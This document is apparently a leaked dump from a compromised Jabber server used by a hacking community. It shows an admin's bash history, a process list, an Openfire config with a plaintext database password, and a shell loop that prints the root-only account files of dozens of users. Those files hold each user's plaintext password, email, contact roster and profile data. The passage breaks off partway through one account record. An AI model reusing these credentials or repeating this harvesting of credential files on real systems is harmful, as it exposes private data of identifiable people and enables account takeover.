http://download.gna.org/mu-conference/mu-conference_0.8.tar.gz +ls -l +gzip -d mu-conference_0.8.tar.gz +ls -l +tar -xvf mu-conference_0.8.tar +ls -l +cd mu-conference_0.8 +ls -l +make +ls -l +cd scr +ls -l +cd src +ls -l +make +ls -l +cd .. +cd .. +ls -l +rm mu-conference_0.8.tar +rm -r mu-conference_0.8 +ls -l +wget http://download.jabberd.org/jabberd14/jabberd-1.4.4.tar.gz +gzip -d jabberd-1.4.4.tar.gz +tar -xvf gzip -d jabberd-1.4.4.tar +ls -l +tar -xvf jabberd-1.4.4.tar +ls -l +cd jabberd-1.4.4 +ls -l +./configure +make +ls -l +cd .. +ls -l +rm jabberd-1.4.4.tar +rm -r jabberd-1.4.4 +ls -l +cd etc +cd jabber +ls -l +vi jabber.d +cd jabber.d +ls -l +cd .. +cd .. +cd .. +ls -l +cd var +cd run +ls -l +cd jabber +ls -l +wget http://ftp.riken.go.jp/pub/FreeBSD/distfiles/jabber/jud-0.4.tar.gz +ls -l +gzip -d jud-0.4.tar.gz +tar -xvf jud-0.4.tar +ls -l +cd jud-0.4 +ls -l +make +cd .. +ls -l +rm jud-0.4.tar +rm -r jud-0.4 +ls -l +ls -l +cd .. +ls -l +cd var +cd run +cd jabber +ls -l +ps aux +cd .. +cd .. +ls -l +cd .. +ls -l +cd etc +ls -l +cd jabber +ls -l +vi jabber-muc.xml +ps aux +cd .. +cd .. +cd var +cd run +cd jabber +ls -l + su jabber +ls -l +ps aux +cd .. +cd .. +ls -l +cd etc +cd .. +ls -l +cd etc +cd jabber +ls -l +vi jabber.xml +cd .. +ls -l +cd jabber +ls -l +cd .. +cd init.d +ls -l +cd jabber +cd .. +ls -l +cd .. +cd usr +cd lib +ls -l +cd jabber +ls -l +cd mu-conference +ls -l +cd .. +cd .. +cd.. +cd .. +cd .. +cd etc +cd jabber +ls -l +vi jabber.xml +vi jabber-muc.xml +jabber-muc +cd .. +ls -l +cd default +ls -l +jabber-muc +cd jabber-muc +jabber-muc +cd jabber-muc +exec jabber-muc +cd .. +cd .. +cd var +cd spool +ls -l +cd .. +cd .. +ls -l +cd etc +cd jabber +ls -l +vi jabber-muc.xml +ps aux +cd .. +ls -l +cd etc +cd jabber +ls -l +vi jabber-muc.xml +vi jabber-jud.xml +vi jabber.xml +cd .. +cd etc +cd jabber +ls -l +vi jabber.xml +ps aux +cd .. +cd .. +cd usr +ls -l +cd lib +ls -l +cd jabber +ls -l +cd mu-conference +ls -l +cd .. +cd .. +cd .. +cd .. +cd etc +ls -l +cd jabber +ls -l +vi +vi jabber.xml +ps aux +kill 26124 +ls -l +ps aux +cd .. +cd .. +cd usr +cd sbin +ls -l +jabberd -h jabber-swissfaking.net +cd .. +cd .. +cd etc +ls -l +cd jabber +ls -l +vi jabber.xml +cd .. +cd .. +cd usr +cd sbin +jabberd -h jabber-swissfaking.net +ps aux +netstat -tlun +cd .. +cd cd var +ls -l +cd var +cd run +cd jabber +ls -l +cd .. +cd .. +ls -l +cd .. +ls -l +cd usr +cd sbin +ls -l +jabber-muc +jabberd -much jabber-swissfaking.net +cd .. +cd etc +cd jabber +ls -l +vi jabber.xml +vi jabber.cfg +cd.. +cd .. +cd .. +cd var +cd lib +cd jabber +ls -l +cd .. +cd .. +cd var +cd var +cd .. +cd var +cd run +cd jabber +ls -l +ps aux +kill 3184 +jabberd -h jabber-swissfaking.net +cd .. +ls-l +ls -l +cd etc +cd jabber +ls -l +vi jabber-muc.xml +vi jabber-jud.xml +cd .. +default +cd default +vi jabber-muc +cd .. +cd jabber +ls -l +vi jabber.xml +netstat -tlun +cd .. +cd .. +cd var +cd run +cd jabber +ps aux +kill 18354 +jabberd -h jabber-swissfaking.net +cd.. +cd .. +cd etc +cd jabber +ls -l +cd jabber.d +ls -l +jabber-jud +jabber-jud -h +cd jabber-jud +jabber-jud +jabber-jud -h jabber-swissfaking.net +cd .. +cd . +cd .. +cd .. +cd var +cd spool +ls -l +cd .. +cd .. +ps aux +cd /usr/lib/jvm/ja +cd usr +cd .. +cd usr +cd lib +cd ... +cd .. +cd .. +cd etc +ls -l +cd init.d +ls -l +openfire restart +openfire restart +cd openfir +openfire stop +sudo /etc/init.d/openfire restart +ls -l +cd .. +cd /usr/share/openfire +ls -l +cd lib +ls -l +ps aux +cd /usr/sbin/jabberd +cd /usr/sbin/jabberd +cd /usr/sbin/ +ls -l +ps aux +kill 7313 +ps aux +sudo /etc/init.d/openfire restart +cd .. +ps aux +kill 13651 +sudo /etc/init.d/openfire restart +ps aux +ps aux +ps aux +ps aux +ps aux +ps aux +sudo /etc/init.d/openfire start +ps aux +cd .. +ls -l +ps aux +sudo /etc/init.d/openfire restart +ps aux +ps aux +ps aux +kill 13754 +ps aux +ps aux +sudo /etc/init.d/openfire restart +ps aux +kill 26588 +sudo /etc/init.d/openfire restart +cd .. +ls - +ls -l +cd etc +ls -l +cd jabber +ls -l +del +rm jabber.xml +rm jabber.d +rm jabber.cfg +rm jabber-muc.xml +rm jabber-jud.xml +ls -l +cd jabber.d +ls -l +rm jabber-jud +rm jabber-muc +ls -l +cd .. +ls -l +rmdir jabber.d +ls -l +cd .. +ls -l +cd .. +cd var +cd run +ls -l +rm jabber +cd jabber +ls -l +cd .. +ls -l +cd .. +ls -l +cd +ls -l +cd .. +ls -l +ps aux +cd.. +cd .. +ls -l +ps aux +sudo /etc/init.d/openfire restart +cd .. +ps-aux +ps aux +sudo /etc/init.d/openfire restart +ps aux +cd .. +ps aux +sudo /etc/init.d/openfire restart +cd .. +ps aux +sudo /etc/init.d/openfire restart +sensor + +# ps aux +USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND +root 1 0.0 0.1 1980 688 ? Ss 2010 0:05 init [2] +openfire 1703 0.0 25.0 342352 131124 ? Sl Jan03 4:30 /usr/lib/jvm/java-6-sun/bin/java -server -DopenfireHome=/usr/share/openfire -Dopenfire.lib.dir=/usr/share/openfire/lib -classpath /usr/share/openfire/lib/startup.jar -jar /us +root 3392 0.0 0.1 1692 616 ? Ss 2010 0:00 /sbin/syslogd +108 3399 0.0 0.1 2480 860 ? Ss 2010 0:00 /usr/bin/dbus-daemon --system +avahi 3410 0.0 0.2 2876 1432 ? Ss 2010 0:00 avahi-daemon: running [jabbersw.local] +avahi 3411 0.0 0.0 2744 452 ? Ss 2010 0:00 avahi-daemon: chroot helper +root 3417 0.0 0.1 5272 1032 ? Ss 2010 0:00 /usr/sbin/sshd +www-data 3632 0.0 1.1 38240 6232 ? S Jan02 0:00 /usr/sbin/apache2 -k start +postgres 3750 0.0 0.9 40668 4960 ? S 2010 0:01 /usr/lib/postgresql/8.3/bin/postgres -D /var/lib/postgresql/8.3/main -c config_file=/etc/postgresql/8.3/main/postgresql.conf +postgres 5193 0.0 1.2 40668 6540 ? Ss 2010 0:04 postgres: writer process +postgres 5194 0.0 0.2 40668 1288 ? Ss 2010 0:02 postgres: wal writer process +postgres 5195 0.0 0.2 40808 1424 ? Ss 2010 0:01 postgres: autovacuum launcher process +postgres 5196 0.0 0.2 11988 1192 ? Ss 2010 0:05 postgres: stats collector process +root 5230 0.0 0.1 108572 940 ? Ssl 2010 0:00 /usr/sbin/nscd +root 5262 0.0 0.1 2912 820 ? Ss 2010 0:00 /usr/sbin/xinetd -pidfile /var/run/xinetd.pid -stayalive -inetd_compat -inetd_ipv6 +root 5279 0.0 0.1 2036 688 ? Ss 2010 0:00 /usr/sbin/cron +root 5430 0.0 2.3 37740 12556 ? Ss 2010 0:00 /usr/sbin/apache2 -k start +postgres 7792 0.0 1.2 41992 6744 ? Ss 00:53 0:01 postgres: openfire openfire 127.0.0.1(43823) idle +postgres 7801 0.0 1.1 41916 6044 ? Ss 00:53 0:01 postgres: openfire openfire 127.0.0.1(43824) idle +postgres 7802 0.0 1.2 41980 6300 ? Ss 00:53 0:01 postgres: openfire openfire 127.0.0.1(43825) idle +postgres 7803 0.0 1.2 41976 6296 ? Ss 00:53 0:01 postgres: openfire openfire 127.0.0.1(43826) idle +postgres 13420 0.0 1.2 41988 6720 ? Ss 00:53 0:01 postgres: openfire openfire 127.0.0.1(43907) idle +www-data 17911 0.0 1.1 38236 6220 ? S Jan03 0:00 /usr/sbin/apache2 -k start +root 22036 0.0 0.1 2296 776 pts/0 R+ 07:10 0:00 ps aux +www-data 26577 0.0 1.1 38240 6236 ? S Jan02 0:00 /usr/sbin/apache2 -k start +root 30105 0.0 0.2 2760 1408 pts/0 Ss 07:04 0:00 -bash + +# cd /usr/share/openfire && ls -la +total 20 +drwxr-x--- 5 openfire openfire 4096 Jan 3 00:49 . +drwxr-xr-x 114 root root 4096 Aug 9 02:02 .. +lrwxrwxrwx 1 openfire openfire 13 Aug 9 02:02 conf -> /etc/openfire +lrwxrwxrwx 1 openfire openfire 29 Aug 9 02:02 embedded-db -> /var/lib/openfire/embedded-db +drwxr-x--- 2 openfire openfire 4096 Aug 9 02:02 lib +lrwxrwxrwx 1 openfire openfire 17 Aug 9 02:02 logs -> /var/log/openfire +drwxr-xr-x 3 openfire openfire 4096 Jan 3 00:49 monitoring +lrwxrwxrwx 1 openfire openfire 25 Aug 9 02:02 plugins -> /var/lib/openfire/plugins +drwxr-x--- 3 openfire openfire 4096 Aug 9 02:02 resources + +# cd conf && ls -la +total 32 +drwxr-x--- 3 openfire openfire 4096 Jan 6 16:40 . +drwxr-xr-x 84 root root 4096 Jan 3 01:45 .. +-rw-r--r-- 1 openfire openfire 9403 Jan 6 16:40 available-plugins.xml +-rw-r--r-- 1 openfire openfire 1876 Jan 3 00:51 openfire.xml +drwxr-x--- 2 openfire openfire 4096 Jan 3 01:31 security +-rw-r--r-- 1 openfire openfire 11 Jan 6 16:40 server-update.xml + +# cat openfire.xml + + + + + + + + 9618 + 9619 + + de + + + + org.jivesoftware.database.DefaultConnectionProvider + + + + org.postgresql.Driver + jdbc:postgresql://localhost:5432/openfire + openfire + pass123 + select 1 + true + true + 5 + 25 + 1.0 + + + true + + + false + + + + +# cd /var/lib/jabber && ls -la +total 12 +drwxr-xr-x 3 jabber adm 4096 Jul 30 21:44 . +drwxr-xr-x 27 root root 4096 Aug 9 02:02 .. +drwx------ 2 root root 4096 Aug 9 01:34 jabber-swissfaking.net + +# cd jabber-swissfaking.net && ls -la +total 192 +drwx------ 2 root root 4096 Aug 9 01:34 . +drwxr-xr-x 3 jabber adm 4096 Jul 30 21:44 .. +-rw------- 1 root root 1332 Aug 4 16:46 afroman.xml +-rw------- 1 root root 1387 Aug 8 15:38 babypanda.xml +-rw------- 1 root root 411 Aug 4 00:03 basics.xml +-rw------- 1 root root 976 Aug 3 15:31 batonde.xml +-rw------- 1 root root 9717 Aug 8 21:56 bullddoser.xml +-rw------- 1 root root 845 Aug 3 17:44 cr4ck.xml +-rw------- 1 root root 9791 Aug 8 15:16 crankz.xml +-rw------- 1 root root 391 Aug 3 15:43 cryten.xml +-rw------- 1 root root 906 Aug 7 19:39 darkfunny.xml +-rw------- 1 root root 596 Aug 8 17:47 dotsyn.xml +-rw------- 1 root root 564 Aug 4 16:47 el!t3.xml +-rw------- 1 root root 2177 Aug 8 23:08 fickmaus.xml +-rw------- 1 root root 391 Aug 4 23:26 flash.xml +-rw------- 1 root root 1428 Aug 5 16:17 freakout.xml +-rw------- 1 root root 1201 Aug 8 23:20 glycerin\40jabber-swissfaking.net.xml +-rw------- 1 root root 787 Aug 4 14:37 hackthenet.xml +-rw------- 1 root root 1300 Aug 5 16:17 hans-wurst.xml +-rw------- 1 root root 390 Aug 5 00:59 holzmen.xml +-rw------- 1 root root 636 Aug 7 23:25 jamyla\40jabber-swissfaking.net.xml +-rw------- 1 root root 393 Jul 30 22:10 kappy777.xml +-rw------- 1 root root 392 Aug 5 15:38 kluless.xml +-rw------- 1 root root 424 Aug 9 00:55 luigi100.xml +-rw------- 1 root root 794 Aug 8 15:39 naik.xml +-rw------- 1 root root 390 Aug 8 16:36 nitex.xml +-rw------- 1 root root 699 Aug 8 22:16 racketeer.xml +-rw------- 1 root root 992 Aug 5 16:17 s0xtech.xml +-rw------- 1 root root 392 Aug 3 23:16 sinned.xml +-rw------- 1 root root 20723 Aug 5 16:27 st3ffl0r.xml +-rw------- 1 root root 2325 Aug 8 03:49 syntax\40jabber-swissfaking.net.xml +-rw------- 1 root root 645 Aug 9 01:12 syntex.xml +-rw------- 1 root root 724 Aug 8 15:39 theird21.xml +-rw------- 1 root root 1754 Aug 8 15:38 the|biggie.xml +-rw------- 1 root root 1764 Aug 9 01:34 trickz.xml +-rw------- 1 root root 409 Aug 3 20:22 w!cked.xml +-rw------- 1 root root 396 Aug 8 03:12 w00dka.xml +-rw------- 1 root root 1324 Aug 5 05:06 weareone.xml +-rw------- 1 root root 547 Aug 8 18:22 yaboybigt.xml + +# for file in *; do echo $file; cat $file; echo -e "\n"; done +afroman.xml +JGMlms91afromanregisteredFriendsFriendsFriendsFriends + +babypanda.xml +BTYM8hbabypandaBabyPandaregisteredDisconnectedFriendsFriendsFriendsFriends + +basics.xml +nicki123!basicsregisteredDisconnected + +batonde.xml +1asdfghjklbatonderegistered\roster:delimiterReplaced by new connectionbatonde<ROLE/><URL/><DESC/></vCard><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb> + +bullddoser.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>xdfhrrt568KZKF6)</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>bullddoser</username><name>BullDDOSer</name><email>Bullddoser@pakistans.com</email><x xmlns='jabber:x:delay' stamp='20100730T20:37:19'>registered</x></query><vCard xmlns='vcard-temp' xdbns='vcard-temp'><N><FAMILY/> +<GIVEN/> +<MIDDLE/> +</N> +<ORG><ORGNAME/> +<ORGUNIT/> +</ORG> +<FN/> +<URL/> +<TITLE/> +<NICKNAME/> +<PHOTO><TYPE>image/jpeg</TYPE><BINVAL>iVBORw0KGgoAAAANSUhEUgAAADAAAAAwCAIAAADYYG7QAAAXYUlEQVR42i2XCZRbV5nny6WtpNIuPent70lv35+kKqtUkkpVJan2fXNVucpLed+w4yW2E8dxbLezeI/t2ImBxIRAAuSQEE7oJk2zJXRgzoQtaZrDGeYMA909mSYN4dDQsc3MJ5NzPum85d77fvf7/t93720aGRmpVMq9veVqtVitFnqrpZ7eUrXWVauXq7VSL1xXS319pXq9WKuWa9WuWq1Yr3cODBYHBorwvL+/Alavl8H6+7qGBopjY/nR0a5aX3d3rdQYE0boLff2NKxa7YRmcAvjwCvo3tfX6NvXVxgcLPf3d01PDzdVKpVisdDebufzVkeHlc9n8qszhUKu0JntKGTgtlCwi8XGf0dHBqxQsIpFu1y2S6...AAAElFTkSuQmCC</BINVAL></PHOTO> +<EMAIL><HOME/><INTERNET/><PREF/><USERID/> +</EMAIL> +<TEL><PAGER/><WORK/><NUMBER/> +</TEL> +<TEL><CELL/><WORK/><NUMBER/> +</TEL> +<TEL><VOICE/><WORK/><NUMBER/> +</TEL> +<TEL><FAX/><WORK/><NUMBER/> +</TEL> +<TEL><PAGER/><HOME/><NUMBER/> +</TEL> +<TEL><CELL/><HOME/><NUMBER/> +</TEL> +<TEL><VOICE/><HOME/><NUMBER/> +</TEL> +<TEL><FAX/><HOME/><NUMBER/> +</TEL> +<ADR><WORK/><PCODE/> +<REGION/> +<STREET/> +<CTRY/> +<LOCALITY/> +</ADR> +<ADR><HOME/><PCODE/> +<REGION/> +<STREET/> +<CTRY/> +<LOCALITY/> +</ADR> +</vCard><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='both'><group>Friends</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='both'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Friends</group></item><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group></item></query><query xmlns='jabber:iq:last' last='1281222880' xdbns='jabber:iq:last'>Disconnected</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb> + +cr4ck.xml +<xdb><query xmlns='jabber:iq:last' last='1280843048' xdbns='jabber:iq:last'>Registered</query><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>hahaha</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>cr4ck</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T13:44:08'>registered</x></query><foo xdbns='jabber:x:offline' xmlns='jabber:x:offline'><message from='jabber-swissfaking.net' to='cr4ck@jabber-swissfaking.net'> + <subject>Welcome!</subject> + <body>Welcome to the Jabber server -- we hope you enjoy this service! For information about how to use Jabber, visit the Jabber User's Guide at http://jabbermanual.jabberstudio.org/</body> + <x xmlns='jabber:x:delay' from='cr4ck@jabber-swissfaking.net' stamp='20100803T13:44:08'>Offline Storage</x></message></foo></xdb> + +crankz.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>muttertier11</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>crankz</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T09:23:54'>registered</x></query><scratchpad xmlns='scratchpad:tasks' j_private_flag='1' xdbns='scratchpad:tasks'><tasks showAll='true'/></scratchpad><foo xdbns='jabber:xdb:nslist' xmlns='jabber:xdb:nslist'><ns type='private'>scratchpad:tasks</ns></foo><vCard xmlns='vcard-temp' xdbns='vcard-temp'><PHOTO><TYPE>image/png</TYPE><BINVAL>iVBORw0KGgoAAAANSUhEUgAAAFAAAABQCAIAAAABc2X6AAAAA3NCSVQICAjb4U/gAAAXyklEQVR42sV8XY/jRpblIXlFHanoLNou72T3VA9ysL0LA9sP/dALLPZp//q+zeM...uQmCC</BINVAL></PHOTO></vCard><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='Fickmaus' subscription='to'><group>Jabber - Swissfaking</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Jabber - Swissfaking</group></item><item jid='trickz@jabber-swissfaking.net' name='Trickz' subscription='to'><group>Jabber - Swissfaking</group></item><item jid='hans-wurst@jabber-swissfaking.net' name='hans-wurst' subscription='both'><group>Jabber - Swissfaking</group></item><item jid='freakout@jabber-swissfaking.net' name='Freakout' subscription='both'><group>Jabber - Swissfaking</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' name='Syntax' subscription='from' ask='subscribe'><group>Jabber - Swissfaking</group></item></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281266160' xdbns='jabber:iq:last'>Disconnected</query></xdb> + +cryten.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>54342101</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>cryten</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T11:41:15'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280835782' xdbns='jabber:iq:last'/></xdb> + +darkfunny.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>Master1993</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>darkfunny</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T15:07:57'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280934820' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group></item><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='to'><group>Friends</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='both'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='to' subscribe=''><group>Friends</group></item></query></xdb> + +dotsyn.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>ownage</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>dotsyn</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100802T20:47:52'>registered</x></query><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group></item></query><query xmlns='jabber:iq:last' last='1281275221' xdbns='jabber:iq:last'>Replaced by new connection</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb> + +el!t3.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>huren1</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>el!t3</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T13:39:06'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280843826' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='none' subscribe='' hidden=''/></query></xdb> + +fickmaus.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>t9N#1~R\dKd6</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>fickmaus</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100730T18:12:17'>registered</x></query><foo xdbns='jabber:xdb:nslist' xmlns='jabber:xdb:nslist'><ns type='private'>scratchpad:tasks</ns></foo><scratchpad xmlns='scratchpad:tasks' j_private_flag='1' xdbns='scratchpad:tasks'><tasks showAll='true'/></scratchpad><query xmlns='jabber:iq:last' last='1281226381' xdbns='jabber:iq:last'>Disconnected</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='both'><group>Friends</group><group>swiss</group></item><item jid='babypanda@jabber-swissfaking.net' name='babypanda' subscription='both'><group>Friends</group><group>swiss</group></item><item jid='bullddoser@jabber-swissfaking.net' name='bullddoser' subscription='both'><group>swiss</group></item><item jid='crankz@jabber-swissfaking.net' subscription='from'><group>swiss</group></item><item jid='freakout@jabber-swissfaking.net' subscription='from'><group>swiss</group></item><item jid='hackthenet@jabber-swissfaking.net' name='hackthenet' subscription='both'><group>Friends</group><group>swiss</group></item><item jid='the|biggie@jabber-swissfaking.net' subscription='from'><group>swiss</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='both'><group>Friends</group><group>swiss</group></item><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group><group>swiss</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='from'/><item jid='racketeer@jabber-swissfaking.net' subscription='from'/><item jid='darkfunny@jabber-swissfaking.net' subscription='from'/><item jid='conference.localhost' subscription='from' ask='subscribe'/><item jid='glycerin\40jabber-swissfaking.net@jabber-swissfaking.net' name='glycerin@jabber-swissfaking.net' subscription='both'><group>Friends</group></item></query></xdb> + +flash.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>12SchneSi</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>flash</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T19:24:16'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280949991' xdbns='jabber:iq:last'/></xdb> + +freakout.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>Ghana11</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>freakout</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T10:13:13'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280922217' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='Fickmaus' subscription='to'><group>Friends</group></item><item jid='trickz@jabber-swissfaking.net' name='Trickz' subscription='to'><group>Friends</group></item><item jid='afroman@jabber-swissfaking.net' name='Afroman' subscription='to'><group>Friends</group></item><item jid='babypanda@jabber-swissfaking.net' name='BabyPanda' subscription='to'><group>Friends</group></item><item jid='s0xtech@jabber-swissfaking.net' name='s0xtech' subscription='to'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Friends</group></item><item jid='crankz@jabber-swissfaking.net' name='Crankz' subscription='both'><group>Friends</group></item><item jid='hans-wurst@jabber-swissfaking.net' name='hans-wurst' subscription='both'><group>Friends</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='none' subscribe='' hidden=''/></query></xdb> + +glycerin\40jabber-swissfaking.net.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>kevin123</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>glycerin\40jabber-swissfaking.net</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100808T11:37:30'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='babypanda@jabber-swissfaking.net' name='BabyPanda' subscription='none' ask='subscribe'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='none' ask='subscribe'><group>Friends</group></item><item jid='naik@jabber-swissfaking.net' name='naik' subscription='none' ask='subscribe'><group>Friends</group></item><item jid='theird21@jabber-swissfaking.net' name='theird21' subscription='none' ask='subscribe'><group>Friends</group></item><item jid='racketeer@jabber-swissfaking.net' name='Racketeer' subscription='both'><group>Friends</group></item><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='both'><group>Friends</group></item></query><query xmlns='jabber:iq:last' last='1281295248' xdbns='jabber:iq:last'/></xdb> + +hackthenet.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>sonne123</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>hackthenet</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100802T21:49:48'>registered</x></query><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='both'><group>Friends</group></item><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='both'><group>Friends</group></item><item jid='babypanda@jabber-swissfaking.net' name='babypanda' subscription='both'><group>Friends</group></item></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280918275' xdbns='jabber:iq:last'/></xdb> + +hans-wurst.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>volkan</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>hans-wurst</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T09:45:39'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280956100' xdbns='jabber:iq:last'>Disconnected</query><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='to'><group>Swiss</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='to'><group>Swiss</group></item><item jid='babypanda@jabber-swissfaking.net' name='BabyPanda' subscription='to'><group>Swiss</group></item><item jid='s0xtech@jabber-swissfaking.net' name='s0xtech' subscription='to'><group>Swiss</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Swiss</group></item><item jid='crankz@jabber-swissfaking.net' name='crankz' subscription='both'><group>Swiss</group></item><item jid='freakout@jabber-swissfaking.net' name='FreakOut' subscription='both'><group>Swiss</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='from'/></query></xdb> + +holzmen.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>jabing</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>holzmen</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T12:52:11'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280955549' xdbns='jabber:iq:last'/></xdb> + +jamyla\40jabber-swissfaking.net.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>2wsx6zhn</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>jamyla\40jabber-swissfaking.net</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100802T20:58:39'>registered</x></query><scratchpad xmlns='scratchpad:tasks' j_private_flag='1' xdbns='scratchpad:tasks'><tasks showAll='true'/></scratchpad><foo xdbns='jabber:xdb:nslist' xmlns='jabber:xdb:nslist'><ns type='private'>scratchpad:tasks</ns></foo><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281209105' xdbns='jabber:iq:last'/></xdb> + +kappy777.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>kappy777</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>kappy777</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100730T17:44:43'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280513424' xdbns='jabber:iq:last'/></xdb> + +kluless.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>wtf!1337</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>kluless</username><email/><name/><x xmlns='jabber:x:delay' 